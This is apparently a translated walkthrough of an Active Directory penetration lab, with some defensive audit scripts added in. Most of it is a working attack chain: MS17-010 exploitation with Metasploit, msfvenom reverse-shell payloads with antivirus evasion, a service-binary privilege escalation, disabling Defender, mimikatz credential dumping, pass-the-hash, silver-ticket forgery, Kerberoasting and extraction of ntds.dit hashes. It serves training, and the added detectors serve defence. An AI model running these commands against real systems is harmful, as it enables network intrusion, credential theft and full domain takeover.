Offensive lab: domain penetration

This lab has no web service; you go straight into the Client machine and attack from there.

The lab expects you to carry out the attack with the tools present on the Client machine.

I tested two ways here: one using my own approach, and one using the tools on the Client machine.

Lab download:
Link: https://pan.baidu/s/1zH5Dbhcnor6rnCBZKsVjKw?pwd=rks3  Extraction code: rks3

The machine passwords are included there as well, but note that the domain controller password is: Password@

You also need to configure the network segment: the lab machines are on the 159 subnet, so create a second virtual network (VM2) in host-only mode.

Once it is configured, assign this adapter to every lab machine.

Testing with my own method

After getting in, first upload fscan and scan to see the domain structure.

First check the IP address.

Run fscan across the whole subnet:

fscan.exe -h 192.168.159.0/24

192.168.159.20:1433 open
192.168.159.200:445 open
192.168.159.20:445 open
192.168.159.10:445 open
192.168.159.200:139 open
192.168.159.20:139 open
192.168.159.10:139 open
192.168.159.200:135 open
192.168.159.20:135 open
192.168.159.10:135 open
192.168.159.200:88 open
192.168.159.10:7680 open
[*] NetInfo 
[*]192.168.159.200
   [->]dc
   [->]192.168.159.200
[*] NetInfo 
[*]192.168.159.20
   [->]Offensive-SQL1
   [->]192.168.159.20
[+] MS17-010 192.168.159.200	(Windows Server 2016 Datacenter Evaluation 14393)
[*] NetInfo 
[*]192.168.159.10
   [->]Client1
   [->]192.168.159.10
[*] NetBios 192.168.159.200 [+] DC:dc.offensive.local            Windows Server 2016 Datacenter Evaluation 14393
[*] NetBios 192.168.159.20  Offensive-SQL1.offensive.local      Windows Server 2016 Datacenter Evaluation 14393

Live hosts

192.168.159.200 ----> dc (domain controller)
192.168.159.20 -----> Offensive-SQL1
192.168.159.10 ----> Client1 (this machine)

.20 is probably the SQL server.

Taking the domain controller

In the scan above we also found that the domain controller is vulnerable to MS17-010. Doesn't that mean we can take the DC directly?

Open Kali.

msfconsole

search MS17-010

Try the first module first.

Type options to see the settings.

set RHOSTS 192.168.159.200

set LHOST 192.168.159.128

set payload windows/x64/meterpreter/reverse_tcp

exploit

That didn't work; try number 10.

use 10

That didn't work either.

Neither worked. It turned out that when starting the lab I had forgotten to configure the environment: Kali and the lab machines were not on the same subnet.

Open the Virtual Network Editor and fix it (note that the lab machines are all on the 159 subnet, so put Kali on the same subnet).

Once that is set, running windows/smb/ms17_010_psexec takes the DC directly.

With the DC compromised, every host in the domain can be taken.

Taking the SQL server host

To be thorough, let's see whether we can take the SQL server host, 192.168.159.20.

Escalate privileges on the Client first.

Privilege escalation

Type

systeminfo

to see which patches are installed and whether any of them allow privilege escalation.

[01]: KB4506998
[02]: KB4462930
[03]: KB4465065
[04]: KB4470788
[05]: KB4480056
[06]: KB4489907
[07]: KB4503308
[08]: KB4489899

https://www.adminxe/win-exp/#

For Windows 10, none of these patches give a usable escalation.

Next, check whether any system service has misconfigured permissions. (When Windows starts it launches a number of services, and each service's executable runs in the background. If a low-privileged user has write permission on one of these executables, that user can change its contents and add malicious code; at the next boot Windows runs the modified executable as SYSTEM, which yields elevated privileges.)

Generate a payload with msf:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=4444 -f exe > /home/exm/Desktop/shell.exe

But this payload cannot run on the Client, because Defender is present.

I don't know how to do AV evasion, so I can only use someone else's ready-made project.

Recommended: https://github/fdx-xdf/darkPulse

First generate a raw binary:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=4444 -f raw -o /home/exm/Desktop/shell.bin

darkPulse.exe -i shell.bin

This produces Program.exe, the payload with evasion applied.

Put it on the Client.

Kali:

use exploit/multi/handler

set LHOST 192.168.159.10

set payload windows/x64/meterpreter/reverse_tcp

exploit

It still gets blocked by Defender.

It runs for a moment, then gets deleted.

Let's try the trusted service path vulnerability for escalation.

Check whether it exists with the following command:

wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """

It exists.

We still need to check whether we have write permission:

icacls "C:/Program Files/"

C:/Program Files/ NT SERVICE\TrustedInstaller:(F)
                  NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                  NT AUTHORITY\SYSTEM:(M)
                  NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                  BUILTIN\Administrators:(M)
                  BUILTIN\Administrators:(OI)(CI)(IO)(F)
                  BUILTIN\Users:(RX)
                  BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                  CREATOR OWNER:(OI)(CI)(IO)(F)
                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

Our current user is Alice, presumably an ordinary user, so we look at this entry:

BUILTIN\Users:(RX)
BUILTIN\Users:(OI)(CI)(IO)(GR,GE)

(M) means modify, (F) full control, (CI) container inherit (subordinate containers inherit the ACE), (OI) object inherit (subordinate files inherit the ACE).

Users only have read and execute, with no write permission, so this vulnerability cannot be used for escalation.
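As an added example that is not part of the original post, here is a Python audit of the two checks above done offline: it parses icacls output to decide whether a principal actually holds a write-class right on the directory (the (RX)/(GR,GE) versus (M)/(F) distinction), and it flags auto-start services with unquoted, space-containing paths outside C:\Windows together with the shorter paths the service control manager would try first. The icacls text and the service list are constructed sample input; the ACL mirrors the one printed above.

```python
import re
from dataclasses import dataclass, field

# icacls rights (simple and specific forms) that let a principal change or replace an object.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WDAC", "WO"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}


@dataclass
class Ace:
    principal: str
    flags: set = field(default_factory=set)    # inheritance flags such as OI, CI, IO
    rights: set = field(default_factory=set)   # rights such as F, M, RX, GR, GE
    deny: bool = False


def parse_icacls(output: str, path: str) -> list:
    """Parse the output of `icacls <path>` into one Ace per principal line."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):                # only the first line carries the path
            line = line[len(path):].strip()
        idx = line.rfind(":(")                   # principal:(flag)(flag)(rights)
        if idx == -1:
            continue                             # blank line or the summary line
        ace = Ace(line[:idx].strip())
        for tok in re.findall(r"\(([^)]*)\)", line[idx + 1:]):
            if tok == "DENY":
                ace.deny = True
            elif tok in INHERIT_FLAGS:
                ace.flags.add(tok)
            else:
                ace.rights.update(t.strip() for t in tok.split(","))
        aces.append(ace)
    return aces


def can_write(aces: list, principal: str) -> bool:
    """True if the principal holds a write-class right on the object itself.
    IO (inherit-only) entries apply to children, so they are skipped; DENY wins."""
    allowed = False
    for ace in aces:
        if ace.principal.lower() != principal.lower() or "IO" in ace.flags:
            continue
        if ace.rights & WRITE_RIGHTS:
            if ace.deny:
                return False
            allowed = True
    return allowed


def unquoted_service_paths(services: list) -> list:
    """services: (name, pathname, startmode) tuples as `wmic service get` prints them.
    Returns auto-start services whose unquoted binary path contains a space and lies
    outside C:\\Windows, plus the shorter paths the service control manager tries first;
    a defender must make sure none of those locations is writable by standard users."""
    findings = []
    for name, pathname, startmode in services:
        exe = pathname.strip()
        if startmode.lower() != "auto" or exe.startswith('"') or exe.lower().startswith("c:\\windows\\"):
            continue
        m = re.match(r"(.*?\.exe)", exe, re.IGNORECASE)   # binary only, arguments dropped
        binary = m.group(1) if m else exe
        if " " in binary:
            candidates = [binary[:i] + ".exe" for i, ch in enumerate(binary) if ch == " "]
            findings.append((name, binary, candidates))
    return findings


# Constructed sample input; the ACL is the one icacls printed for C:\Program Files above.
SAMPLE_PATH = "C:/Program Files/"
ICACLS_SAMPLE = r"""C:/Program Files/ NT SERVICE\TrustedInstaller:(F)
                  NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                  NT AUTHORITY\SYSTEM:(M)
                  NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                  BUILTIN\Administrators:(M)
                  BUILTIN\Administrators:(OI)(CI)(IO)(F)
                  BUILTIN\Users:(RX)
                  BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
"""
SERVICES_SAMPLE = [
    ("VulnService", r"C:\Program Files\Vuln Service\VulnService.exe", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Good Svc\good.exe" -run', "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
]

if __name__ == "__main__":
    acl = parse_icacls(ICACLS_SAMPLE, SAMPLE_PATH)
    for who in ("BUILTIN\\Users", "BUILTIN\\Administrators"):
        print(f"{who}: can write = {can_write(acl, who)}")
    for name, binary, candidates in unquoted_service_paths(SERVICES_SAMPLE):
        print(f"{name}: unquoted path {binary}; check {candidates}")
```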

AlwaysInstallElevated escalation (group policy): check whether it is enabled.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Neither query works, so this is basically useless.

At this point I was out of ideas.

Actually there is another way: create a member of the Domain Admins group on the DC and log into the SQL server directly.

Following someone else's method

After getting into the client, we find it is an ordinary account, so escalate first.

Privilege escalation

We need a tool: PowerUp.ps1

PowerUp is the script in the Privesc module; it bundles many utility functions for finding Windows service vulnerabilities on the target host for privilege escalation.

Entering PowerShell may be restricted; enter

Powershell -ep bypass

to bypass it.

Import PowerUp.ps1:

Import-Module .\PowerUp.ps1

Use it to see which vulnerabilities can be used for escalation:

Invoke-AllChecks -verbose


ServiceName   : VulnService
Path          : C:\Program Files\Vuln Service\VulnService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'VulnService' -Path <HijackPath>

HijackablePath : C:\Users\Alice\AppData\Local\Microsoft\WindowsApps\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\Alice\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll'
                 -Command '...'

HijackablePath : C:\Python27\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Python27\\wlbsctrl.dll' -Command '...'

HijackablePath : C:\Python27\Tools\Scripts\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Python27\Tools\Scripts\\wlbsctrl.dll' -Command '...'

Key            : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bginfo
Path           : C:\BGinfo\Bginfo.exe /accepteula /ic:\bginfo\bgconfig.bgi /timer:0
ModifiableFile : C:\BGinfo\Bginfo.exe

We find that VulnService.exe can be modified by a low-privileged user, so we can use it for escalation (the later entries show that DLL hijacking escalation is also possible).

Write-ServiceBinary -ServiceName VulnService -UserName "offensive\alice" -Password Passw0rd!

Running this command automatically generates an escalation exe for us.

Then replace the contents of VulnService.exe:

cp .\service.exe "C:\Program Files\Vuln Service\VulnService.exe"

Check the state of the VulnService service:

sc qc VulnService

START_TYPE         : 2   AUTO_START

It is set to auto-start.

Reboot.

We can see that alice is now in the Administrators group.

After the reboot we are an administrator-level user, so turn off Defender directly:

Set-MpPreference -disablerealtimeMonitoring $true

Remember to start PowerShell as administrator.

Next, upload mimikatz and dump credentials (version 2.1 is required here to get them).

Information gathering

privilege::debug

sekurlsa::logonpasswords

Then use PowerView for a round of information gathering.

Get-NetDomain    # get the name of the domain the current user belongs to

The current domain is offensive.local.

We can also see which host is the domain controller:

Get-NetDomainController    # get information on all domain controllers

The domain controller is dc.offensive.local.

Its IP is 192.168.159.200.

Now look at the domain users:

Get-NetUser | select name

You can also see full details by leaving out | select name.

Here we mainly look at name and memberof, and find that user dbadmin is in the Domain Admins group. If we take that account we can roam the whole domain, because Domain Admins is the domain administrators group.

Get-NetGroup    # get information on all domain groups and their members
Get-NetGroup -UserName dbadmin

Look directly at the group information for dbadmin.

This also shows the Domain Admins group.

Next we could go straight to a PtH attack: try Alice's password hash against the dbadmin user and see whether it succeeds.

It works.

I'll hold off on that here and keep following the original method.

Now look at which computers are in the domain:

Get-NetComputer | select name

DC
SQL1
CLIENT1
OFFENSIVE-SQL1

Four hosts show up here, but the lab only has three machines in total; I don't understand this either.

From the computer names we guess there is a SQL service.

Next, use the PowerUpSQL.ps1 tool:

Import-Module .\PowerUpSQL.ps1

Get-SQLInstanceDomain    # discover SQL Server instances in the domain

ComputerName     : SQL1.offensive.local
Instance         : SQL1.offensive.local,1433
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount    : dbadmin
DomainAccountCn  : dbadmin
Service          : MSSQLSvc
Spn              : MSSQLSvc/SQL1.offensive.local:1433
LastLogon        : 5/20/2025 8:02 AM
Description      :

ComputerName     : SQL1.offensive.local
Instance         : SQL1.offensive.local\SQLEXPRESS
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount    : dbadmin
DomainAccountCn  : dbadmin
Service          : MSSQLSvc
Spn              : MSSQLSvc/SQL1.offensive.local:SQLEXPRESS
LastLogon        : 5/20/2025 8:02 AM
Description      :

ComputerName     : Offensive-SQL1.offensive.local
Instance         : Offensive-SQL1.offensive.local,1433
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount    : dbadmin
DomainAccountCn  : dbadmin
Service          : MSSQLSvc
Spn              : MSSQLSvc/Offensive-SQL1.offensive.local:1433
LastLogon        : 5/20/2025 8:02 AM
Description      :

ComputerName     : Offensive-SQL1.offensive.local
Instance         : Offensive-SQL1.offensive.local\SQLEXPRESS
DomainAccountSid : 150000052100019116520170230181228241449319714281400
DomainAccount    : dbadmin
DomainAccountCn  : dbadmin
Service          : MSSQLSvc
Spn              : MSSQLSvc/Offensive-SQL1.offensive.local:SQLEXPRESS
LastLogon        : 5/20/2025 8:02 AM
Description      :

ComputerName     : Offensive-SQL1
Instance         : Offensive-SQL1,1433
DomainAccountSid : 150000052100019116520170230181228241449319714280400
DomainAccount    : dbuser1
DomainAccountCn  : dbuser1
Service          : MSSQLSvc
Spn              : MSSQLSvc/Offensive-SQL1:1433
LastLogon        : 8/31/2019 11:29 PM
Description

We can see the scan found just two SQL instances:

SQL1.offensive.local
Offensive-SQL1.offensive.local

These are the two hosts.

Both hosts are associated with the dbadmin account (this user is in the Domain Admins group, which is very important!). If we can take it through the SQL service we hold a high-privileged account that can log straight into the DC.

We can also look at other information. I list a few commands here; you can search online for more PowerUpSQL.ps1 usage.

Get-SQLServerConfiguration -Instance SQLServerTest   # view the configuration of instance SQLServerTest

Get-SQLServerInfo -Instance SQLServerTest            # view the service information of instance SQLServerTest

Get-SQLServerLogin -Instance SQLServerTest           # view the logins of instance SQLServerTest

Get-SQLConnectionTest -Instance SQLServerTest        # check whether instance SQLServerTest is reachable

Invoke-SQLAudit -Instance SQLServerTest -verbose     # check instance SQLServerTest for misconfigurations

Here SQLServerTest stands for one of the discovered SQL instances (SQL1, Offensive-SQL1).

The question is which one to choose; we choose Offensive-SQL1.

Why? I don't know either; I went and looked inside the lab machine directly, haha.

Invoke-SQLAudit -Instance Offensive-SQL -verbose

All the commands are worth trying, but none of them turned up much.

Back to PowerView:

Find-LocalAdminAccess    # find computers in the domain where the current user has local administrator access

Only our current host, and that is from the escalation we did ourselves.

No way forward.

Then I found that HeidiSQL with Windows authentication is supposed to connect directly to MSSQL (the SQL service), but I could not log in no matter what I tried.

No choice but PtH (pass-the-hash).

Taking the SQL server host

Use Alice's hash to test whether dbadmin can log in.

We obtain Alice's hash with mimikatz.

Open Kali and use impacket's wmiexec, which gives an interactive shell; don't use smbexec.

python3 wmiexec.py -hashes :3766c17d09689c438a072a33270cb6f5 offensive.local/dbadmin@192.168.159.20

Let's try logging into the domain controller directly:

python3 wmiexec.py -hashes :3766c17d09689c438a072a33270cb6f5 offensive.local/dbadmin@192.168.159.200

The DC is taken as well; we could stop here.

Now let's try the other approaches.

Taking the domain controller

Use mimikatz's Pass the Hash attack to open a PowerShell:

.\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:dbadmin /domain:offensive.local /ntlm:3766c17d09689c438a072a33270cb6f5 /run:powershell.exe" exit

The PowerShell that opens runs as dbadmin, and every network request it makes is made as dbadmin (a member of Domain Admins, able to roam the whole domain).

Then enter

Enter-PSSession -ComputerName dc.offensive.local

and we are on the domain controller.

Turn off Defender first:

Set-MpPreference -disablerealtimeMonitoring $true

Persistence (forging silver and golden tickets)

To forge a silver ticket we need to know which services exist in the domain and which users have an SPN set.

An SPN (Service Principal Name) is the identifier the Kerberos authentication protocol uses to uniquely identify a service instance. In an Active Directory (AD) environment, an SPN binds a service (a database, a web service, and so on) to the user account that runs it (usually a service account), so that clients can authenticate to and access the service securely through Kerberos.

In short, to forge a silver ticket you must know the SPN, and the SPN is the service.

Use GetUserSPNs.ps1 to see which users have an SPN bound:

.\GetUserSPNs.ps1

ServicePrincipalName : kadmin/changepw
Name                 : krbtgt
SAMAccountName       : krbtgt
MemberOf             : CN=Denied RODC Password Replication Group,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 8/18/2019 4:35:31 AM

ServicePrincipalName : MSSQLSvc/SQL1.offensive.local:1433
Name                 : dbadmin
SAMAccountName       : dbadmin
MemberOf             : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 5/20/2025 8:02:17 AM

ServicePrincipalName : MSSQLSvc/SQL1.offensive.local:SQLEXPRESS
Name                 : dbadmin
SAMAccountName       : dbadmin
MemberOf             : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 5/20/2025 8:02:17 AM

ServicePrincipalName : MSSQLSvc/Offensive-SQL1.offensive.local:1433
Name                 : dbadmin
SAMAccountName       : dbadmin
MemberOf             : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 5/20/2025 8:02:17 AM

ServicePrincipalName : MSSQLSvc/Offensive-SQL1.offensive.local:SQLEXPRESS
Name                 : dbadmin
SAMAccountName       : dbadmin
MemberOf             : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 5/20/2025 8:02:17 AM

ServicePrincipalName : MSSQLSvc/Offensive-SQL1:1433
Name                 : dbuser1
SAMAccountName       : dbuser1
MemberOf             :

What we want is the SPN bound to the dbadmin account:

ServicePrincipalName : MSSQLSvc/Offensive-SQL1.offensive.local:1433
Name                 : dbadmin
SAMAccountName       : dbadmin
MemberOf             : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 5/20/2025 8:02:17 AM
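The finding above (a Domain Admins member running a service under an SPN) is exactly what an AD hygiene audit should catch before an attacker does. As an added example, not from the original post, this Python script parses GetUserSPNs.ps1-style output and reports SPN accounts that sit in privileged groups or whose password is stale; the input block and the audit date are constructed sample data in the layout shown above.

```python
import re
from datetime import datetime

# Groups whose members should never double as SPN-bearing service accounts.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}
AUDIT_DATE = datetime(2025, 5, 22)   # constructed "now" for the sample below


def parse_spn_records(text: str) -> list:
    """Split 'Key : Value' blocks separated by blank lines into dicts."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")   # first colon ends the key; SPNs keep theirs
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def group_names(member_of: str) -> set:
    # Every DN starts with the group's CN. Container CNs such as 'Users' match too,
    # which is harmless because they never appear in PRIVILEGED_GROUPS.
    return set(re.findall(r"CN=([^,]+)", member_of))


def audit_spn_accounts(records: list, now: datetime, max_age_days: int = 365) -> dict:
    """Per account: its SPNs and the issues that make it a priority target for
    ticket cracking (privileged membership, password older than max_age_days)."""
    report = {}
    for r in records:
        account = r.get("SAMAccountName", "")
        if not account or account.lower() == "krbtgt":
            continue                              # the KDC account always has kadmin/changepw
        entry = report.setdefault(account, {"spns": set(), "issues": set()})
        entry["spns"].add(r.get("ServicePrincipalName", ""))
        privileged = group_names(r.get("MemberOf", "")) & PRIVILEGED_GROUPS
        if privileged:
            entry["issues"].add("member of " + ", ".join(sorted(privileged)))
        last_set = r.get("PasswordLastSet")
        if last_set:
            age = (now - datetime.strptime(last_set, "%m/%d/%Y %I:%M:%S %p")).days
            if age > max_age_days:
                entry["issues"].add(f"password last set {age} days ago")
    return {acct: e for acct, e in report.items() if e["issues"]}


# Constructed sample in the GetUserSPNs.ps1 layout shown above.
SPN_SAMPLE = """\
ServicePrincipalName : kadmin/changepw
Name                 : krbtgt
SAMAccountName       : krbtgt
MemberOf             : CN=Denied RODC Password Replication Group,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 8/18/2019 4:35:31 AM

ServicePrincipalName : MSSQLSvc/Offensive-SQL1.offensive.local:1433
Name                 : dbadmin
SAMAccountName       : dbadmin
MemberOf             : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 5/20/2025 8:02:17 AM

ServicePrincipalName : MSSQLSvc/SQL1.offensive.local:1433
Name                 : dbadmin
SAMAccountName       : dbadmin
MemberOf             : CN=Domain Admins,CN=Users,DC=offensive,DC=local
PasswordLastSet      : 5/20/2025 8:02:17 AM

ServicePrincipalName : MSSQLSvc/Offensive-SQL1:1433
Name                 : dbuser1
SAMAccountName       : dbuser1
MemberOf             :
PasswordLastSet      : 8/31/2019 11:29:31 PM
"""

if __name__ == "__main__":
    for acct, e in audit_spn_accounts(parse_spn_records(SPN_SAMPLE), AUDIT_DATE).items():
        print(acct, sorted(e["spns"]), sorted(e["issues"]))
```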

We know that forging a silver ticket means forging an ST (service ticket). To forge one we need:

  • the target host's hash
  • the target domain name
  • the target domain's SID
  • the user account name to impersonate
  • the RID of the user to impersonate
  • the RID of the group that account belongs to

Now we can forge a silver ticket for dbadmin, because we already know dbadmin's hash and dbadmin is bound to the MSSQLSvc service.

hash: 3766c17d09689c438a072a33270cb6f5
sid: S-1-5-21-1187620287-4058297830-2395299116
target domain name: offensive.local
user account name to impersonate: can be anything
RID of the user to impersonate: 1103 (the number that follows the SID; this can be forged too, as long as 1103 has rights in the domain. It can even be forged as 500, but that is easily detected)
service name: MSSQLSvc

kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /target:Offensive-SQL1:1433 /service:MSSQLSvc /rc4:3766c17d09689c438a072a33270cb6f5 /user:idontexist /id:1103    (saved to a file)

kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /target:Offensive-SQL1:1433 /service:MSSQLSvc /rc4:3766c17d09689c438a072a33270cb6f5 /user:idontexist /id:1103 /ptt    (injected into memory)

/target: the target computer name
/service: the service name, i.e. the SPN we enumerated above (MSSQLSvc/Offensive-SQL1.offensive.local:1433); MSSQLSvc alone is enough
/id: the RID

The ticket was forged successfully; with it we can then access the MSSQL service.
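The two properties the text points out (the user name can be anything, and the RID need not belong to that name) are also what gives a forged service ticket away on the service host. As an added defensive example that is not from the original post, this Python check correlates a Kerberos network logon (event 4624 on the SQL host) with the directory and with the DC's TGS requests (event 4769); the directory snapshot, the event records and the time window are constructed sample input, with field names taken from the Windows event schema.

```python
from datetime import datetime, timedelta

# Constructed directory snapshot: account name -> RID (RIDs as they appear on this page).
DOMAIN_SID = "S-1-5-21-1187620287-4058297830-2395299116"
DIRECTORY = {"administrator": 500, "alice": 1103, "dbuser1": 1104, "dbadmin": 1105}
TGS_WINDOW = timedelta(minutes=10)   # a genuine service ticket follows a TGS-REQ closely


def rid_of(sid: str) -> int:
    return int(sid.rsplit("-", 1)[1])


def forged_ticket_indicators(logon: dict, tgs_requests: list, directory: dict = DIRECTORY) -> list:
    """Check one Kerberos network logon (4624) on the service host against the directory
    and against the DC's TGS requests (4769). Returns the reasons it looks like a forged
    service ticket; an empty list means the logon is consistent."""
    if logon["LogonType"] != 3 or logon["AuthenticationPackageName"] != "Kerberos":
        return []
    if logon["TargetDomainName"].lower() not in ("offensive", "offensive.local"):
        return []                                   # local accounts are out of scope here
    reasons = []
    name = logon["TargetUserName"].lower()
    sid = logon["TargetUserSid"]
    if not sid.startswith(DOMAIN_SID + "-"):
        reasons.append("SID is not from this domain")
    elif name not in directory:
        reasons.append("account does not exist in the directory")   # e.g. /user:idontexist
    elif directory[name] != rid_of(sid):
        reasons.append(f"RID {rid_of(sid)} in the SID does not belong to {name} (expected {directory[name]})")
    t = logon["TimeCreated"]
    seen_tgs = any(r["TargetUserName"].lower().split("@")[0] == name      # 4769 names carry @REALM
                   and t - TGS_WINDOW <= r["TimeCreated"] <= t
                   for r in tgs_requests)
    if not seen_tgs:
        reasons.append("no TGS request (4769) for this account on the DC before the logon")
    return reasons


def _logon(name: str, rid: int, when: datetime) -> dict:
    return {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
            "TargetDomainName": "OFFENSIVE", "TargetUserName": name,
            "TargetUserSid": f"{DOMAIN_SID}-{rid}", "TimeCreated": when}


# Constructed sample events: one genuine logon and two that match the page's forged ticket.
T0 = datetime(2025, 5, 21, 23, 10)
DC_TGS_REQUESTS = [{"EventID": 4769, "TargetUserName": "dbadmin@OFFENSIVE.LOCAL",
                    "TimeCreated": T0 - timedelta(seconds=5)}]
SAMPLE_LOGONS = {
    "legit": _logon("dbadmin", 1105, T0),
    "fake_name": _logon("idontexist", 1103, T0 + timedelta(minutes=1)),
    "rid_mismatch": _logon("alice", 500, T0 + timedelta(minutes=2)),
}

if __name__ == "__main__":
    for label, ev in SAMPLE_LOGONS.items():
        print(label, forged_ticket_indicators(ev, DC_TGS_REQUESTS) or "consistent")
```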

When we don't know the service account's hash, we can actually crack it.

First request a ticket for the service, save the ticket locally, and then crack the saved ticket.

Use Add-Type to request the ticket:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/Offensive-SQL1:1433'

Then use mimikatz to save the ticket locally:

kerberos::list /export

Then crack it:

python tgsrepcrack.py pass.txt "*.kirbi"

Forging a golden ticket

A golden ticket is a forged TGT, and the key to forging a TGT is knowing the krbtgt hash.

Right now we don't know the krbtgt hash. krbtgt lives on the domain controller, and we took the DC above with administrator privileges.

We can grab the ntds.dit file from the DC. This file stores the hashes of every domain user, but it is encrypted and needs the SYSTEM hive to decrypt, so we need both files: ntds.dit and SYSTEM.

To get ntds.dit we need the tool Invoke-NinjaCopy.ps1:

Invoke-NinjaCopy -Path C:\Windows\NTDS\ntds.dit -Verbose -LocalDestination 'C:\Users\dbadmin\Desktop\ntds.dit'

It threw an error, which suggested there might be a problem, but ntds.dit is now on our desktop.

Next, grab the SYSTEM hive:

reg save HKLM\SYSTEM C:\Users\dbadmin\Desktop\SYS    (saved to the desktop)

Then transfer both to our client host (the DC can copy files to any host in the domain):

Copy-Item '\\dc.offensive.local\C$\Users\dbadmin\Desktop\ntds.dit' -Destination '\\Client1.offensive.local\C$\Users\alice\Desktop\tools\ntds.dit'

Copy-Item '\\dc.offensive.local\C$\Users\dbadmin\Desktop\SYS' -Destination '\\Client1.offensive.local\C$\Users\alice\Desktop\tools\SYS'

Next is decrypting the ntds file, which needs Get-BootKey:

Get-BootKey -SystemHivePath 'SYS'
$key = Get-BootKey -SystemHivePath 'SYS'
Get-ADDBAccount -All -DBPath 'C:\Users\Alice\Desktop\tools\ntds.dit' -BootKey $key

Error; it is probably the problem we hit when copying ntds on the DC.

We can repair ntds.dit with the Windows esentutl binary and transfer it again:

esentutl.exe /p 'C:\Users\dbadmin\Desktop\ntds.dit' /!10240 /8 /o

Copy-Item '\\dc.offensive.local\C$\Users\dbadmin\Desktop\ntds.dit' -Destination '\\Client1.offensive.local\C$\Users\alice\Desktop\tools\ntds.dit'

Continue decrypting:

Get-ADDBAccount -All -DBPath 'C:\Users\Alice\Desktop\tools\ntds.dit' -BootKey $key

      Hash 13: f4aabe1af294ef01584044bfba4c5d8b
      Hash 14: 2cf0dfbe30d430545ee8a7c285ce32bf
      Hash 15: 437194c2e99971df9774566e6eb95b21
      Hash 16: 588541add7bd772e608fc2c15a2fb45f
      Hash 17: c9a90cd75c4694fc02ecb9840887619d
      Hash 18: 794f4e30b9e731b48dc5da6ebb459a73
      Hash 19: d6f432cd39e7b628417bbd8de4a3196e
      Hash 20: 794f4e30b9e731b48dc5da6ebb459a73
      Hash 21: ee4600ad6839293e999184fedba1040b
      Hash 22: 4e1e5f912d70b1d925299dc169c6f484
      Hash 23: ee4600ad6839293e999184fedba1040b
      Hash 24: 534126de07c97dcbe4e58ae27af67500
      Hash 25: 0c0d957ae780724993685276bd9dd161
      Hash 26: d6282162c866a82e7f418ffefcf69770
      Hash 27: e743910adefc57e8ec1791df291e4850
      Hash 28: ab3a77490142c04c6b355f91aa378d8a
      Hash 29: e743910adefc57e8ec1791df291e4850
Key Credentials:
Credential Roaming
  Created:
  Modified:
  Credentials:

DistinguishedName: CN=SQL1,CN=Computers,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1106
Guid: feef262e-517c-4688-afd2-613061c3dc4e
SamAccountName: SQL1$
SamAccountType: Computer
UserPrincipalName:
PrimaryGroupId: 515
SidHistory:
Enabled: True
UserAccountControl: WorkstationAccount
AdminCount: False
Deleted: False
LastLogon: 9/1/2019 12:19:13 AM
DisplayName: SQL1$
GivenName:
Surname:
Description:
ServicePrincipalName: {HOST/SQL1, RestrictedKrbHost/SQL1, WSMAN/SQL1, HOST/SQL1.offensive.local...}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
  NTHash: 9f8482a3e31287796f3c90e44b5030e3
  LMHash:
  NTHashHistory:
    Hash 01: 9f8482a3e31287796f3c90e44b5030e3
